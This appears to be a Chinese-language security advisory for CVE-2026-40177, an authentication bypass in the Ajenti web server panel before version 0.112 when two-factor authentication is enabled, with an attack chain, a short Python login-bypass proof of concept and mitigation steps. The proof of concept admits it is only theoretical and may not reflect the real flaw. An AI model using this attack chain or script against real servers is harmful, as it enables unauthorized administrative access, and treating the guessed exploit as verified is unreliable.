CVE-2026-40177 CVSS 7.5 高危

CVE-2026-40177 Ajenti认证绕过漏洞

披露日期: 2026-04-10

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-40177

漏洞类型

认证绕过

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Ajenti

漏洞概述

Ajenti是一款基于Web的服务器管理面板。在ajenti.plugin.core组件0.112版本之前存在一个逻辑缺陷，当系统启用双因素认证（2FA）时，攻击者可以绕过密码认证环节。这意味着用户无需知道正确的密码，仅需利用该漏洞即可部分或完全绕过第一道防线，对系统安全性构成严重威胁。

技术细节

该漏洞源于Ajenti核心插件在处理多因素认证流程时的逻辑错误。在受影响版本中，当2FA功能开启时，系统并未正确强制要求在进入下一步验证前完成密码验证，导致认证流程可被绕过。攻击者可以通过网络（AV:N）向目标服务器发送特制的HTTP请求。由于无需用户交互（UI:N）且无需预先权限（PR:N），该漏洞利用门槛较低。成功利用后，攻击者可能获得对管理界面的访问权限，进而对系统完整性造成高影响（I:H），例如修改配置或执行管理命令。官方已在0.112版本中修复了此逻辑漏洞。

攻击链分析

STEP 1

侦察

扫描网络寻找开启80/8000端口的Ajenti管理面板服务。

STEP 2

漏洞利用

向登录接口发送特制数据包，利用逻辑缺陷跳过密码验证步骤。

STEP 3

权限获取

绕过认证后，访问管理界面，获得对系统的部分或完全控制权。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Conceptual Proof of Concept for CVE-2026-40177
# This script demonstrates bypassing the password authentication when 2FA is active.
# Note: This is a theoretical example based on the vulnerability description.

target_url = "http://target-ajenti-server:8000/api/login"

# In a normal scenario, both password and 2FA token are required.
# The vulnerability allows skipping the password check.
payload = {
    "username": "admin",
    # "password": "secret_password",  # This field might be ignored or bypassed
    "otp": "123456"  # Valid 2FA token (if required by the bypass logic)
}

try:
    response = requests.post(target_url, json=payload)
    if response.status_code == 200 and "session_token" in response.json():
        print("[+] Authentication bypass successful! Session obtained.")
    else:
        print("[-] Bypass failed or patch applied.")
except Exception as e:
    print(f"Error: {e}")

影响范围

Ajenti ajenti.plugin.core < 0.112

防御指南

临时缓解措施

建议立即升级到Ajenti 0.112版本以彻底修复该漏洞。如果暂时无法升级，可以禁用双因素认证（如果该漏洞仅存在于2FA开启时）或直接关闭Ajenti服务，并将管理面板置于反向代理之后进行IP白名单限制，直到完成升级。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表